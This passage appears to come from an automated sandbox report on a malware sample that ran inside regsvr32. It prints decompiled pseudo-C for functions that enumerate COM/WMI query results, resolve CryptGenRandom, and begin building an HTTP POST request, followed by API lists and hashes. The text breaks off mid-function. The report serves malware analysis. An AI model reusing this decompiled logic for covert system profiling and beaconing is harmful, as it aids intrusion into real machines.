                                                                                                                                                                        • Instruction Fuzzy Hash: 98111B75B08205AFDB14CF99C585AA9B7E8FB49324F18C96DE85A9B304D7B0E940CB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 0536EA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0536EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0536E400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E05368BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E05368BF4( &_v60, 0xfffffffe);
					E0536E4B4( &_v104);
					return _t320;
				}
				_t165 = E05369DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E05369DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E05369A5A(_t165);
				_v60 = _t322;
				E05368BAF( &_v52);
				E05368BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E05369DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E05368BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E05368BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E053698BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E053698BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E05368C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E05368BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E05368BF4(_t136, 0);
								E05368BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E053698BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E05369DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E05369DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05368BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E05368BAF( &_v92);
											E05368BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E05369E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05368BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E05369DF2(_t283, 0xe0a);
										E05369E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E05368BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E053698BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0536E92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E05368BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                        0x0536ea53
                                                                                                                                                                        0x0536ea59
                                                                                                                                                                        0x0536ea60
                                                                                                                                                                        0x0536ea63
                                                                                                                                                                        0x0536ea66
                                                                                                                                                                        0x0536ea6b
                                                                                                                                                                        0x0536ea6d
                                                                                                                                                                        0x0536ea72
                                                                                                                                                                        0x0536eeba
                                                                                                                                                                        0x0536eeba
                                                                                                                                                                        0x0536ea7f
                                                                                                                                                                        0x0536ea81
                                                                                                                                                                        0x0536ea84
                                                                                                                                                                        0x0536ea87
                                                                                                                                                                        0x0536ee9f
                                                                                                                                                                        0x0536eea5
                                                                                                                                                                        0x0536eeaf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eeb4
                                                                                                                                                                        0x0536ea92
                                                                                                                                                                        0x0536ea99
                                                                                                                                                                        0x0536eaa0
                                                                                                                                                                        0x0536eaa3
                                                                                                                                                                        0x0536eaa8
                                                                                                                                                                        0x0536eaaa
                                                                                                                                                                        0x0536eaad
                                                                                                                                                                        0x0536eab0
                                                                                                                                                                        0x0536eab1
                                                                                                                                                                        0x0536eaba
                                                                                                                                                                        0x0536eac0
                                                                                                                                                                        0x0536eac3
                                                                                                                                                                        0x0536eacc
                                                                                                                                                                        0x0536ead1
                                                                                                                                                                        0x0536ead6
                                                                                                                                                                        0x0536eaed
                                                                                                                                                                        0x0536eafa
                                                                                                                                                                        0x0536eafd
                                                                                                                                                                        0x0536eb04
                                                                                                                                                                        0x0536eb09
                                                                                                                                                                        0x0536eb10
                                                                                                                                                                        0x0536eb15
                                                                                                                                                                        0x0536eb1c
                                                                                                                                                                        0x0536eb1e
                                                                                                                                                                        0x0536eb2a
                                                                                                                                                                        0x0536eb2d
                                                                                                                                                                        0x0536eb2f
                                                                                                                                                                        0x0536ee8f
                                                                                                                                                                        0x0536ee90
                                                                                                                                                                        0x0536ee99
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee99
                                                                                                                                                                        0x0536eb35
                                                                                                                                                                        0x0536eb38
                                                                                                                                                                        0x0536eb3b
                                                                                                                                                                        0x0536eb3e
                                                                                                                                                                        0x0536eb40
                                                                                                                                                                        0x0536ee5b
                                                                                                                                                                        0x0536ee5e
                                                                                                                                                                        0x0536ee61
                                                                                                                                                                        0x0536ee63
                                                                                                                                                                        0x0536ee85
                                                                                                                                                                        0x0536ee8a
                                                                                                                                                                        0x0536ee65
                                                                                                                                                                        0x0536ee68
                                                                                                                                                                        0x0536ee73
                                                                                                                                                                        0x0536ee7a
                                                                                                                                                                        0x0536ee7a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eb46
                                                                                                                                                                        0x0536eb46
                                                                                                                                                                        0x0536eb58
                                                                                                                                                                        0x0536eb5b
                                                                                                                                                                        0x0536eb5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eb65
                                                                                                                                                                        0x0536eb68
                                                                                                                                                                        0x0536eb6b
                                                                                                                                                                        0x0536eb6e
                                                                                                                                                                        0x0536eb71
                                                                                                                                                                        0x0536eb74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eb7a
                                                                                                                                                                        0x0536eb88
                                                                                                                                                                        0x0536eb8b
                                                                                                                                                                        0x0536eb8d
                                                                                                                                                                        0x0536eba6
                                                                                                                                                                        0x0536ebb5
                                                                                                                                                                        0x0536ebbd
                                                                                                                                                                        0x0536ebbd
                                                                                                                                                                        0x0536ebc0
                                                                                                                                                                        0x0536ebc7
                                                                                                                                                                        0x0536ebcb
                                                                                                                                                                        0x0536ebd1
                                                                                                                                                                        0x0536ebd3
                                                                                                                                                                        0x0536ee43
                                                                                                                                                                        0x0536ee49
                                                                                                                                                                        0x0536ee4f
                                                                                                                                                                        0x0536ee52
                                                                                                                                                                        0x0536ee52
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee52
                                                                                                                                                                        0x0536ebe2
                                                                                                                                                                        0x0536ebf6
                                                                                                                                                                        0x0536ebfa
                                                                                                                                                                        0x0536ebfc
                                                                                                                                                                        0x0536ec01
                                                                                                                                                                        0x0536ee10
                                                                                                                                                                        0x0536ee16
                                                                                                                                                                        0x0536ee21
                                                                                                                                                                        0x0536ee2c
                                                                                                                                                                        0x0536ee32
                                                                                                                                                                        0x0536ee38
                                                                                                                                                                        0x0536ee3b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee3b
                                                                                                                                                                        0x0536ec07
                                                                                                                                                                        0x0536edde
                                                                                                                                                                        0x0536edde
                                                                                                                                                                        0x0536ede1
                                                                                                                                                                        0x0536ede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec0f
                                                                                                                                                                        0x0536ec17
                                                                                                                                                                        0x0536ec1e
                                                                                                                                                                        0x0536ec24
                                                                                                                                                                        0x0536ec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec2f
                                                                                                                                                                        0x0536ec44
                                                                                                                                                                        0x0536ec4a
                                                                                                                                                                        0x0536ec53
                                                                                                                                                                        0x0536ec56
                                                                                                                                                                        0x0536ec59
                                                                                                                                                                        0x0536ec5b
                                                                                                                                                                        0x0536edd1
                                                                                                                                                                        0x0536edd4
                                                                                                                                                                        0x0536eddd
                                                                                                                                                                        0x0536eddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eddd
                                                                                                                                                                        0x0536ec6b
                                                                                                                                                                        0x0536ec6e
                                                                                                                                                                        0x0536ec75
                                                                                                                                                                        0x0536ec7b
                                                                                                                                                                        0x0536ec7e
                                                                                                                                                                        0x0536ec81
                                                                                                                                                                        0x0536ec84
                                                                                                                                                                        0x0536ec87
                                                                                                                                                                        0x0536ecc3
                                                                                                                                                                        0x0536ecc3
                                                                                                                                                                        0x0536ecc6
                                                                                                                                                                        0x0536ed72
                                                                                                                                                                        0x0536ed86
                                                                                                                                                                        0x0536ed96
                                                                                                                                                                        0x0536ed9a
                                                                                                                                                                        0x0536ed9c
                                                                                                                                                                        0x0536edb3
                                                                                                                                                                        0x0536edb7
                                                                                                                                                                        0x0536edc0
                                                                                                                                                                        0x0536edcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536edcb
                                                                                                                                                                        0x0536eda2
                                                                                                                                                                        0x0536eda3
                                                                                                                                                                        0x0536eda8
                                                                                                                                                                        0x0536eda8
                                                                                                                                                                        0x0536edaa
                                                                                                                                                                        0x0536edab
                                                                                                                                                                        0x0536edb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536edb0
                                                                                                                                                                        0x0536eccc
                                                                                                                                                                        0x0536eccc
                                                                                                                                                                        0x0536eccf
                                                                                                                                                                        0x0536ed3a
                                                                                                                                                                        0x0536ed4e
                                                                                                                                                                        0x0536ed5e
                                                                                                                                                                        0x0536ed62
                                                                                                                                                                        0x0536ed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ed6a
                                                                                                                                                                        0x0536ed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ed6b
                                                                                                                                                                        0x0536ecd1
                                                                                                                                                                        0x0536ecd1
                                                                                                                                                                        0x0536ecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecd6
                                                                                                                                                                        0x0536ecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecdb
                                                                                                                                                                        0x0536ecdb
                                                                                                                                                                        0x0536ece1
                                                                                                                                                                        0x0536ecfd
                                                                                                                                                                        0x0536ed0c
                                                                                                                                                                        0x0536ed15
                                                                                                                                                                        0x0536ed1a
                                                                                                                                                                        0x0536ed1d
                                                                                                                                                                        0x0536ed23
                                                                                                                                                                        0x0536ed23
                                                                                                                                                                        0x0536ed28
                                                                                                                                                                        0x0536ed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ed34
                                                                                                                                                                        0x0536ece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ece6
                                                                                                                                                                        0x0536ec89
                                                                                                                                                                        0x0536ecb0
                                                                                                                                                                        0x0536ecb5
                                                                                                                                                                        0x0536ecba
                                                                                                                                                                        0x0536ecbc
                                                                                                                                                                        0x0536ecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecba
                                                                                                                                                                        0x0536ec8b
                                                                                                                                                                        0x0536ec8b
                                                                                                                                                                        0x0536ec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec94
                                                                                                                                                                        0x0536ec94
                                                                                                                                                                        0x0536ec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ec9d
                                                                                                                                                                        0x0536ec9d
                                                                                                                                                                        0x0536eca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eca6
                                                                                                                                                                        0x0536eca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ecab
                                                                                                                                                                        0x0536eded
                                                                                                                                                                        0x0536edf3
                                                                                                                                                                        0x0536edf9
                                                                                                                                                                        0x0536edfc
                                                                                                                                                                        0x0536edff
                                                                                                                                                                        0x0536edff
                                                                                                                                                                        0x0536ee02
                                                                                                                                                                        0x0536ee03
                                                                                                                                                                        0x0536ee06
                                                                                                                                                                        0x0536ee08
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee58
                                                                                                                                                                        0x0536ee58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ee58
                                                                                                                                                                        0x0536eb8f
                                                                                                                                                                        0x0536eb95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eb95
                                                                                                                                                                        0x0536ee55
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ead8
                                                                                                                                                                        0x0536eadd
                                                                                                                                                                        0x0536eae2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eae6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0536E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E413
                                                                                                                                                                          • Part of subcall function 0536E400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E424
                                                                                                                                                                          • Part of subcall function 0536E400: CoCreateInstance.OLE32(0537C868,00000000,00000001,0537C878,?,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E43B
                                                                                                                                                                          • Part of subcall function 0536E400: SysAllocString.OLEAUT32(00000000), ref: 0536E446
                                                                                                                                                                          • Part of subcall function 0536E400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E471
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536EAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536EB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536EE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536EE99
                                                                                                                                                                          • Part of subcall function 05368BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05368C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: 6870f1cf3d3b16bb8cbc469c4e0a3598d42a37c4c2531ae6bca5d6227c1a6e52
                                                                                                                                                                        • Instruction ID: 6dc63434ad1504b020f24f78e94b61715337611c4db8c62d418face0c5731616
                                                                                                                                                                        • Opcode Fuzzy Hash: 6870f1cf3d3b16bb8cbc469c4e0a3598d42a37c4c2531ae6bca5d6227c1a6e52
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE15F76E00219AFDB14DFE4C898EEEBBB9FF48300F10855DE516A7248DB71A905CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053728F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E053728F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E0537284B( &_v16);
				return 0;
			}











                                                                                                                                                                        0x053728f6
                                                                                                                                                                        0x05372908
                                                                                                                                                                        0x0537290c
                                                                                                                                                                        0x05372980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05372982
                                                                                                                                                                        0x0537291c
                                                                                                                                                                        0x05372920
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05372928
                                                                                                                                                                        0x0537292a
                                                                                                                                                                        0x0537292f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05372939
                                                                                                                                                                        0x0537293d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537293f
                                                                                                                                                                        0x05372944
                                                                                                                                                                        0x05372946
                                                                                                                                                                        0x05372948
                                                                                                                                                                        0x0537294d
                                                                                                                                                                        0x05372952
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537295d
                                                                                                                                                                        0x05372967
                                                                                                                                                                        0x0537296b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537297a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,05367B6A), ref: 05372902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0537291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 05372928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 05372937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: f30d0ab52fd3f301217ed33942f3d181b782a035ab2e61a0b0429a85e3286824
                                                                                                                                                                        • Instruction ID: 0d567c8c53e8135800fea3bc0bc06cf5cd6143e55ccb705d62dd5fb80e3a03fb
                                                                                                                                                                        • Opcode Fuzzy Hash: f30d0ab52fd3f301217ed33942f3d181b782a035ab2e61a0b0429a85e3286824
                                                                                                                                                                        • Instruction Fuzzy Hash: 07118237E5030EB7DB31A6A48C45F9FB7ECAF45650F190160FA01F6150EBB8DA01A6A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536F7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E0536F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E05369DD8(0xd62);
				_v52 = E05369DD8(0x8e9);
				_v48 = E05369DD8(0xa93);
				_v44 = E05369DD8(0x9a9);
				_t94 = E05369DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E05368D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0536A43D(_t190));
				_t102 =  *0x537f838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x537f838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x537f920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0536F73E(_t189);
							_t110 =  *0x537f838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0536A065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x537f838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
